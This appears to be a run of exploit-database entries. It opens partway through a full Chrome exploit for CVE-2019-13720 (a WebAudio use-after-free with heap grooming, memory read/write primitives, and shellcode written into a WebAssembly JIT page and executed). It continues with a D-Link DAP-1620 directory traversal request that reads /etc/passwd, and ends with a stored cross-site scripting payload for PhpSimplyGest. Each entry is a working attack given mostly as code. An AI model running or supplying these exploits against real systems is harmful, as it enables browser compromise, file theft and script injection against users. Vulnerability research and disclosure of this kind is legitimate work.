0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]); let DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory. let GcPreventer = []; let IIRFilters = []; var SharedAudioCtx = undefined; let FeedforwardSuperPageMetadata = undefined; let OutputFloatArray = new Float32Array(10); let MutableFreeListAudioBufs = []; let DoubleAllocAudioBufs = []; let ImageDataArray = []; const EnableDebug = true; const AlertOutput = false; var HelperBuf = new ArrayBuffer(8); var HelperDbl = new Float64Array(HelperBuf); var HelperDword = new Uint32Array(HelperBuf); var HelperBigInt = new BigUint64Array(HelperBuf); var HelperUint8 = new Uint8Array(HelperBuf); function DebugLog(Message) { if(EnableDebug) { if(AlertOutput) { alert(Message); } else { console.log(Message); // In IE, console only works if devtools is open. } } } function Sleep(delay) { return new Promise(resolve => setTimeout(resolve, delay)) } function ReverseBigInt(Val) { let ReversedVal = BigInt(0); let TempVal = Val; for (let i = 0; i < 8; i++) { ReversedVal = ReversedVal << BigInt(8); ReversedVal += TempVal & BigInt(0xFF); TempVal = TempVal >> BigInt(8); } return ReversedVal; } function ClearBigIntLow21(Val) { let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111 let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000 return ClearedVal; } let GetSuperPageBase = ClearBigIntLow21; function GetSuperPageMetadata(LeakedPtr) { let SuperPageBase = GetSuperPageBase(LeakedPtr); return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page } function GetPartitionPageIndex(LeakedPtr) { let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1); let Index = (LeakedPtr & Low21Mask) >> BigInt(14); return Index; } function GetPartitionPageMetadata(LeakedPtr) { let Index = GetPartitionPageIndex(LeakedPtr); let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20)); return partitionPageMetadataPtr; } function GetPartitionPageBase(LeakedPtr, Index) { let SuperPageBase = GetSuperPageBase(LeakedPtr); let PartitionPageBase = SuperPageBase + (Index << BigInt(14)); return PartitionPageBase; } function GC() { let MyPromise = new Promise(function(GcCallback) { let Arg; for (var i = 0; i < 400; i++) { new ArrayBuffer(1024 * 1024 * 60).buffer; } GcCallback(Arg); }); return MyPromise; } /* chrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf: 00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=???????????????? */ function LeakQword(FreeListHead, TargetAddress) { FreeListHead[0] = TargetAddress; let TempVal = new BigUint64Array; TempVal.buffer; GcPreventer.push(TempVal); return ReverseBigInt(FreeListHead[0]); } function WriteQword(FreeListHead, TargetAddress, Val) { FreeListHead[0] = TargetAddress; let TempVal = new BigUint64Array(1); TempVal.buffer; TempVal[0] = Val; GcPreventer.push(TempVal); } function CreateWasmJITExport() { /* After this function returns, a new region of memory will appear with a single system page of 0x1000 bytes set to RWX for the JIT region for this WASM module 0x00000ACDB6790000:0x40000000 | Private 0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory 0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory */ var ImportObj = { imports: { imported_func: arg => console.log(arg) } }; const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; const WasmCode = new Uint8Array(WasmModuleBytes); const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj); return WasmModule.exports.exported_func; } /* struct __attribute__((packed)) SlotSpanMetadata { unsigned long freelist_head; unsigned long next_slot_span; unsigned long bucket; uint32_t marked_full : 1; uint32_t num_allocated_slots : 13; uint32_t num_unprovisioned_slots : 13; uint32_t can_store_raw_size : 1; uint32_t freelist_is_sorted : 1; uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1); uint16_t in_empty_cache : 1; uint16_t empty_cache_index : 7; uint16_t unused2 : (16 - 1 - 7); }; struct PartitionPage { union { struct SlotSpanMetadata span; size_t raw_size; struct PartitionSuperPageExtentEntry head; struct { char pad[32 - sizeof(uint16_t)]; uint16_t slot_span_metadata_offset; }; }; }; struct PartitionBucket { unsigned long active_slot_spans_head; unsigned long empty_slot_spans_head; unsigned long decommitted_slot_spans_head; uint32_t slot_size; uint32_t num_system_pages_per_slot_span : 8; uint32_t num_full_slot_spans : 24; }; */ function HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) { for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) { SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct HelperBigInt[0] = SlotSpanMetaAddress; DebugLog("... targetting slot span metadata at " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress); HelperBigInt[0] = BucketAddress; DebugLog("... leaked bucket address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); if(BucketAddress != BigInt(0)) { BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size BucketSize = LeakQword(FreeListHead, BucketAddress); HelperBigInt[0] = BucketSize; DebugLog("... leaked bucket size is " + HelperDword[1].toString(16) + " " + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); if(HelperDword[0] == SlotSize) { DebugLog("... found desired slot size! Reading freelist head for SlotSpan..."); SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress); DebugLog("... leaked slot span freelist address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); return HelperBigInt[0]; } } } } function ExecutePayload(FreeListHead) { var WasmExport = CreateWasmJITExport(); let FileReaderObj = new FileReader; let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment DebugLog("... WASM module and FileReader created."); FileReaderObj.onerror = WasmExport; let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); if (!FileReaderLoaderPtr) { DebugLog("... failed to obtain free list head for bucket size 0x140 slot span"); return; } HelperBigInt[0] = FileReaderLoaderPtr; DebugLog("... estimated a FileReaderLoader alloc address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); if(ValidationPtr != FileReaderLoaderPtr) { HelperBigInt[0] = ValidationPtr; DebugLog("... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68); let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28)); let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr); let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr); let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8)); let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8)); let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1); let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1); let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1); let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1); let StubAddrFieldOffset = undefined; switch (MajorVersion) { case 77: StubAddrFieldOffset = BigInt(0x8) * BigInt(16); break; case 76: StubAddrFieldOffset = BigInt(0x8) * BigInt(17); break } let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset); HelperBigInt[0] = RwxJitStubPtr; DebugLog("... resolved JIT stub address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); for(var x = 0; x < Egghunter.length; x += 8) { JitChunkAddress = RwxJitStubPtr + BigInt(x); HelperBigInt[0] = JitChunkAddress; //DebugLog("... writing chunk of egghunter shellcode at offset " + x.toString(10) + " to JIT region at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); for(var y = 0; y < 8; y++) { HelperUint8[y] = Egghunter[x + y]; } WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]); } HelperBigInt[0] = RwxJitStubPtr; DebugLog("... executing shellcode at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); WasmExport(); } else { DebugLog("... failed to validate re-claim of FileReaderLoader slot at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); } } async function PrePayloadHeapGroom() { DebugLog("... grooming heap in preparation for R/W primitive creation and payload execution..."); await GC(); DoubleAllocAudioBufs = []; // These were the "holders" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. for (var j = 0; j < 80; j++) { MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000)); } // At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W. IIRFilters = new Array(1); await GC(); for (var j = 0; j < 336; j++) { ImageDataArray.push(new ImageData(1, 2)); } ImageDataArray = new Array(10); await GC(); for (var j = 0; j < MutableFreeListAudioBufs.length; j++) { let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer); if (MutableFreeListEntry[0] != BigInt(0)) { let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent. let AllocCount = 0; MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr); // Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated do { GcPreventer.push(new ArrayBuffer(8)); if (++AllocCount > 0x100000) { DebugLog("... failed to re-claim final free list flink with alloc spray"); return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed } } while (MutableFreeListEntry[0] != BigInt(0)); // The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head). let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays. GcPreventer.push(FreeListHead); ExecutePayload(FreeListHead); return; } } return; } async function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) { let NumberOfChannels = 1; let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000); let AudioBufferSourceNode = TempAudioCtx.createBufferSource(); let ConvolverNode = TempAudioCtx.createConvolver(); let Finished = false; // Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF) let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000); let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000); SmallUafBuf.getChannelData(0).fill(0); for (var i = 0; i < NumberOfChannels; i++) { var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer); ChannelData[0] = FeedforwardAddress; } AudioBufferSourceNode.buffer = BigSourceBuf; ConvolverNode.buffer = SmallUafBuf; // Setup the audio processing graph and begin rendering AudioBufferSourceNode.loop = true; AudioBufferSourceNode.loopStart = 0; AudioBufferSourceNode.loopEnd = 1; AudioBufferSourceNode.connect(ConvolverNode); ConvolverNode.connect(TempAudioCtx.destination); AudioBufferSourceNode.start(); TempAudioCtx.startRendering().then(function(Buf) { Buf = null; if (Finished) { TempAudioCtx = null; setTimeout(CallbackFunc, 200); return; } else { Finished = true; setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1); } }); while (!Finished) { ConvolverNode.buffer = null; await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer if (Finished) { break; } for (let i = 0; i < IIRFilters.length; i++) { OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI. IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray); if (OutputFloatArray[0] != 3.1415927410125732) { Finished = true; DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/"holding" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); AudioBufferSourceNode.disconnect(); ConvolverNode.disconnect(); return; } } ConvolverNode.buffer = SmallUafBuf; await Sleep(1); } } function InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) { SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used) HelperBigInt[0] = LeakedFlinkPtr; DebugLog("... leaked free list ptr from ScriptNode audio handler at iteration " + RenderCount.toString(10) + ": " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr); DebugLog("... Super page: " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span. HelperBigInt[0] = FeedforwardSuperPageBase; DebugLog("... first Super Page in extent: " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase); FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit. IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data. HelperBigInt[0] = IIRFilterFeedforwardAllocPtr; DebugLog("... IIRFilterFeedforwardAllocPtr: " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom); } async function InfoleakUAF(CallbackFunc) { let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode. let AudioBufferSourceNode = TempAudioCtx.createBufferSource(); let ConvolverNode = TempAudioCtx.createConvolver(); let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel. let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000); let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); let Finished = false; let RenderCount = 0; ConvolverNode.buffer = ChannelBuf; AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full AudioBufferSourceNode.loop = true; AudioBufferSourceNode.loopStart = 0; AudioBufferSourceNode.loopEnd = 1; ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread AudioBufferSourceNode.connect(ConvolverNode); ConvolverNode.connect(ScriptNode); ScriptNode.connect(TempAudioCtx.destination); AudioBufferSourceNode.start(); ScriptNode.onaudioprocess = function(Evt) { RenderCount++; for (let i = 0; i < 1; i++) { let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer); for (let j = 0; j < ChannelInputBuf.length; j++) { /* Notably, it is not only the first frame of the input buffer which is checked for the leaked flink. There are 16384 frames (each the size of a Float32) copied into the input channel buffer each time this handler receives an event. Typically only 0-1 of these frames will contain a leaked flink freelist pointer. */ if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) { let TempHelperBigInt = new BigUint64Array(1); let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer); TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer TempHelperDword[1] = ChannelInputBuf[j + 1]; let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]); // Check QWORD from SharedAudioBuffer for a non-zero value if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) { LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region? } if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) { // Valid leak: end the recursion cycle for this UAF and execute a callback Finished = true; Evt = null; AudioBufferSourceNode.disconnect(); ScriptNode.disconnect(); ConvolverNode.disconnect(); setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1); return; } } } } }; TempAudioCtx.startRendering().then(function(Buf) { Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle if (!Finished) { Finished = true; InfoleakUAF(CallbackFunc); } }); /* Attack the race condition which allows for a free list flink to be copied into the ScriptNode input channel buffer: the renderer thread is receiving data into the SharedBuffer in the Convolver, processing it, then copying it into the ScriptNode input channel until it is full (then the ScriptNode receives an event). The SharedBuffer must be freed precisely between the time when new data is received from the BufferSource, and the processed data is copied into the ScriptNode. Simply freeing the buffer will not work, since the next chunk of data from the BufferSource will not be placed into SharedBuffer if it is NULL. However, there is no check if SharedBuffer is NULL when the processed data it contains is copied into the ScriptNode input. */ while (!Finished) { ConvolverNode.buffer = null; ConvolverNode.buffer = ChannelBuf; await Sleep(1); // 1ms } } function FeedforwardHeapGroom() { let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data. let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data. // Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory. FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f FeedforwardArray[0] = 0; // Changing these feedforward values has no affect on memory at leaked ptr FeedforwardArray[1] = -1; for (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filtrs are creatd directly after page initialization. IIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray)); } // Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causess an 0x240 slot span to be created in the first Super Page. let Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash. for(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span. TempConvolver = TempAudioCtx.createConvolver(); AudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000); TempConvolver.buffer = AudioBuf; GcPreventer.push(AudioBuf); GcPreventer.push(TempConvolver); } // Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen. let Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance. for(var x = 0; x < (Bucket200Slots / 2); x++) { TempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size) GcPreventer.push(TempConvolver); } } try { var BrowserVersion = navigator.userAgent.split("Chrome/")[1].split(" Safari/")[0]; MajorVersion = parseInt(BrowserVersion.substr(0, 2)); if (MajorVersion <= 78) { ValidBrowser = true; if(MajorVersion != 76) { alert("This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version"); } } else { alert("CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser"); } } catch (e) { DebugLog("... failed to parse browser version from user agent."); } if(ValidBrowser) { FeedforwardHeapGroom(); InfoleakUAF(InfoleakUAFCallback); } else { DebugLog("... unsupported browser version " + navigator.userAgent); } </script> </html>
HireHackking

DLINK DAP-1620 A1 v1.01 - Directory Traversal

HACKER · %s · %s

# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal # Date: 27/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://me.dlink.com/consumer # Version: DAP-1620 - A1 v1.01 # Tested on: Linux # CVE : CVE-2021-46381 POST /apply.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://84.217.16.220/ Cookie: ID=634855649 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 281 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: 84.217.16.220 Connection: Keep-alive action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
HireHackking

PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: PHProjekt PhpSimplyGest v1.3.0 - Stored Cross-Site Scripting (XSS) # Date: 2022-05-05 # Exploit Author: Andrea Intilangelo # Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130) # Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects) # Version: 1.3 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32) # CVE: CVE-2022-27308 # Description: A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor, like "MyProjects") allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard, estimates, report or finding, it will be triggered once page gets loaded. # Steps to reproduce: Click on Projects and add or edit an existing one, Insert the following PoC inside the Title <<SCRIPT>alert("XSS here");//\<</SCRIPT> Click on 'Send'. If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.